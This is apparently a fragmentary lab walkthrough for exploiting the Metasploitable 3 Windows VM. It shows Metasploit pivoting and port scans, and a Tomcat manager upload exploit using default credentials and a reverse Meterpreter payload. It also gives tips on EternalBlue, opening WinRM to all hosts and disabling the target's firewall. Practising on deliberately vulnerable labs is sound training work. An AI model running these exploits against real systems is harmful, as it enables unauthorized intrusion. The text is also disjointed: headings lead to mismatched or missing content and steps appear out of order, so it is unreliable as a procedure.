Metasploitable 3 Windows Walkthrough May 2026

Metasploitable 3 often has two network interfaces: NAT (internet) and Host-Only (192.168.56.x). You can pivot into the host-only network.

```
run autoroute -s 192.168.56.0/24
background
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.56.1-255
set PORTS 445
run
```

You might find your actual host machine. Do not scan without authorization.


```
use auxiliary/scanner/portscan/ack
```


Once you have a Meterpreter session:

```
# System info
sysinfo
getuid
```

```
nmap -sV -p- 192.168.1.100
```

Expected open ports:


| Component | Specification |
|-----------|---------------|
| Attacker | Kali Linux (VM) |
| Target | Metasploitable 3 (Windows Server 2008 / 2012 VM) |
| Network | Host-Only / NAT (both VMs on same isolated network) |
| Tools | Metasploit, Nmap, smbclient, enum4linux, winexe |

Important:


```
msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT 8080
msf6 > set HttpUsername tomcat
msf6 > set HttpPassword tomcat
msf6 > set PAYLOAD java/meterpreter/reverse_tcp
msf6 > exploit
```

| Problem | Solution |
|---------|----------|
| EternalBlue fails | Use `auxiliary/scanner/smb/smb_ms17_010` first. Target may need reboot. |
| WinRM access denied | Ensure `winrm quickconfig` and `Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*"` on target. |
| Jenkins reverse shell no connection | Check Windows firewall – disable it or allow inbound port. |
| Vagrant VM not starting | Increase RAM to 4GB, enable VT-x in BIOS. |